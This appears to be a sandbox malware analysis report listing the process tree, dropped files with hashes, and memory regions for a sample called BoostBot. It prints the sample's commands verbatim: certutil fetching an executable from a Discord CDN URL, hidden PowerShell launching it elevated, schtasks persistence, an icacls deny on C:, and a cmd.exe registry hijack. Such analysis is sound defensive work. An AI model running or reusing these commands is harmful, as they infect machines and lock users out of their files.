                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1764
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1856
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1992
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:2000
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2036
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1620
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1796
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2072
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2188
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2244
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2500
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2508
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2696
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2712
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2756
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2772
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2792
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2852
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3056
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3124
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3412
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3500
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1488
                                                                                            • C:\Windows\system32\certutil.exe
                                                                                              certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
                                                                                              3⤵
                                                                                                PID:1728
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2452
                                                                                                • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4872
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
                                                                                                    5⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:1220
                                                                                                  • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                                    5⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1300
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                                      6⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:736
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1964
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      "schtasks" /delete /tn "$sxr-powershell" /f
                                                                                                      6⤵
                                                                                                        PID:4468
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:2260
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0ABQZ9vpfDyy.bat" "
                                                                                                          6⤵
                                                                                                            PID:4344
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              7⤵
                                                                                                                PID:1452
                                                                                                              • C:\Windows\SysWOW64\chcp.com
                                                                                                                chcp 65001
                                                                                                                7⤵
                                                                                                                  PID:1680
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping -n 10 localhost
                                                                                                                  7⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:4844
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3224
                                                                                                              • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                                "SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST
                                                                                                                6⤵
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2292
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3328
                                                                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                              "SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
                                                                                                              5⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:2788
                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                          icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
                                                                                                          3⤵
                                                                                                          • Modifies file permissions
                                                                                                          PID:4576
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
                                                                                                          3⤵
                                                                                                            PID:4116
                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                            attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                                            3⤵
                                                                                                            • Views/modifies file attributes
                                                                                                            PID:3108
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                        1⤵
                                                                                                          PID:3668
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:3840
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:4008
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:4076
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2284
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                1⤵
                                                                                                                  PID:4928
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                  1⤵
                                                                                                                    PID:2876
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                    1⤵
                                                                                                                      PID:5024
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                      1⤵
                                                                                                                        PID:2380
                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:1344
                                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:2836
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                          1⤵
                                                                                                                            PID:2020
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                            1⤵
                                                                                                                              PID:1060
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:1968
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4472
                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Enumerates system info in registry
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:624

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                  Filesize

                                                                                                                                  338B

                                                                                                                                  MD5

                                                                                                                                  c8bb570fdf65f36c672565379773bc29

                                                                                                                                  SHA1

                                                                                                                                  bb9e8b5cd163fb9692323a09fadb77b4a9e2976c

                                                                                                                                  SHA256

                                                                                                                                  3ee7dce7bfe50816d5c29ce7a711c54ad19ffe2ca922d885839ba9209b567e6f

                                                                                                                                  SHA512

                                                                                                                                  eef2eb6292cb446a55580496f8e6cfc3713bed1cd9eb0e59b003761bbad43e8c6254239dc46237bf13249c533a294f747001fa9f9345b6b6e66ec757938ffa03

                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E

                                                                                                                                  Filesize

                                                                                                                                  556B

                                                                                                                                  MD5

                                                                                                                                  e68e1b4de4efbaff9b2e87c08dfbcae5

                                                                                                                                  SHA1

                                                                                                                                  851ea75a673b58993a8e6e53d253f13a40843904

                                                                                                                                  SHA256

                                                                                                                                  a8fc6777040f978d4f7937b077e94b52f90de16d9d563deef179a9b420e64448

                                                                                                                                  SHA512

                                                                                                                                  3d272bdefb9be37222c2e4fefc4821330af84d0ae805733b0b6d285a889edff3fa7906d823a51cb24d4f3ef6630d4ac6779da1891bed5e4bb2ea2a7d1e61e3b6

                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                                  Filesize

                                                                                                                                  408B

                                                                                                                                  MD5

                                                                                                                                  16ba62b8cbd5ade52cdabbb9e664dfec

                                                                                                                                  SHA1

                                                                                                                                  cc07358db62a5c20a307bd18a2e8a1c672f33d88

                                                                                                                                  SHA256

                                                                                                                                  7de96fe9fe7d7e3569ea32252fccb01062c979fc922b4b2e7ed9b41c65b39db6

                                                                                                                                  SHA512

                                                                                                                                  2327c6c037c4f587bd6fb69a26b23e6ad99109578fe46599c26a5e8ca105a418f7dd673da7a17233ed16d4b0d232d6169192d8a19d30b517d96a3793353e806f

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0ABQZ9vpfDyy.bat

                                                                                                                                  Filesize

                                                                                                                                  283B

                                                                                                                                  MD5

                                                                                                                                  c98aca83de480c65c7d9746a1908a8fc

                                                                                                                                  SHA1

                                                                                                                                  133224d52f1b2514d018b39193199d795fa3ee28

                                                                                                                                  SHA256

                                                                                                                                  5cc44ba41f8d7e83c7eff9fccdedfb792cdd133b9fcf613a3183e2202e08f4a0

                                                                                                                                  SHA512

                                                                                                                                  d8c97b08d4dc94fb0ab0f6c33be06500be005b200f7dccabe834981a88478ee8931e28ae6af7a2637237109161b24b576b0fa1775ce5aea58803d3be5c2614b6

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

                                                                                                                                  Filesize

                                                                                                                                  409KB

                                                                                                                                  MD5

                                                                                                                                  404ab800bbe49c36bd64d0d73600b59a

                                                                                                                                  SHA1

                                                                                                                                  4c8dff2702fada108f7477ad357067310b584366

                                                                                                                                  SHA256

                                                                                                                                  5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

                                                                                                                                  SHA512

                                                                                                                                  d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iropsubf.pdx.ps1

                                                                                                                                  Filesize

                                                                                                                                  60B

                                                                                                                                  MD5

                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                  SHA1

                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                  SHA256

                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                  SHA512

                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                                  Filesize

                                                                                                                                  162KB

                                                                                                                                  MD5

                                                                                                                                  152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                                  SHA1

                                                                                                                                  c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                                  SHA256

                                                                                                                                  a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                                  SHA512

                                                                                                                                  2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                                • C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-12-~1

                                                                                                                                  Filesize

                                                                                                                                  224B

                                                                                                                                  MD5

                                                                                                                                  305ae6a69a1e7dc3ff1b7de7e89e5ec1

                                                                                                                                  SHA1

                                                                                                                                  b5e4886c0e23896ad91ff5e823e8b94abf1641df

                                                                                                                                  SHA256

                                                                                                                                  db99ec9aaa781c9d50c2b7572633fb374ff230368c3bbe52c647b407143549e5

                                                                                                                                  SHA512

                                                                                                                                  84fda52eb647c2d8d8168536b48f8c005d3a09f4472d87a8e7a27fc91a0fe31fb062566d945033d9e15b104d08285fa3b0b3351ae8f7f33088f6bd4bf2d680c3

                                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                  SHA1

                                                                                                                                  445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                  SHA256

                                                                                                                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                  SHA512

                                                                                                                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Filesize

                                                                                                                                  1KB

                                                                                                                                  MD5

                                                                                                                                  aa187cac09f051e24146ad549a0f08a6

                                                                                                                                  SHA1

                                                                                                                                  2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                                  SHA256

                                                                                                                                  7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                                  SHA512

                                                                                                                                  960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  MD5

                                                                                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                  SHA1

                                                                                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                  SHA256

                                                                                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                  SHA512

                                                                                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                • memory/316-124-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/316-123-0x00000146D9190000-0x00000146D91BB000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/316-117-0x00000146D9190000-0x00000146D91BB000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/408-129-0x0000021EF84C0000-0x0000021EF84EB000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-82-0x0000019D96FC0000-0x0000019D96FE5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  148KB

                                                                                                                                • memory/612-83-0x0000019D96FF0000-0x0000019D9701B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-90-0x0000019D96FF0000-0x0000019D9701B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-91-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/612-84-0x0000019D96FF0000-0x0000019D9701B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/676-102-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/676-101-0x00000241CEBA0000-0x00000241CEBCB000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/676-95-0x00000241CEBA0000-0x00000241CEBCB000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/952-113-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/952-112-0x000001D226900000-0x000001D22692B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/952-106-0x000001D226900000-0x000001D22692B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/1300-56-0x0000000006A80000-0x0000000006A8A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  40KB

                                                                                                                                • memory/2064-78-0x00007FFE4E160000-0x00007FFE4E21E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/2064-77-0x00007FFE4F5B0000-0x00007FFE4F7A5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/2064-76-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/2064-69-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/2064-70-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/2064-71-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/2064-72-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/2064-79-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/2452-26-0x00007FFE30DE0000-0x00007FFE318A1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/2452-9-0x00007FFE30DE3000-0x00007FFE30DE5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/2452-11-0x00000203FBAB0000-0x00000203FBAD2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                • memory/2452-20-0x00007FFE30DE0000-0x00007FFE318A1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/2452-21-0x00007FFE30DE0000-0x00007FFE318A1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/2960-66-0x00000231D36E0000-0x00000231D370A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/2960-67-0x00007FFE4F5B0000-0x00007FFE4F7A5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/2960-68-0x00007FFE4E160000-0x00007FFE4E21E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/4872-30-0x0000000004F20000-0x0000000004F86000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  408KB

                                                                                                                                • memory/4872-29-0x0000000004E80000-0x0000000004F12000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  584KB

                                                                                                                                • memory/4872-28-0x0000000005430000-0x00000000059D4000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  5.6MB

                                                                                                                                • memory/4872-27-0x00000000004C0000-0x000000000052C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4872-31-0x0000000005410000-0x0000000005422000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  72KB

                                                                                                                                • memory/4872-32-0x0000000006000000-0x000000000603C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  240KB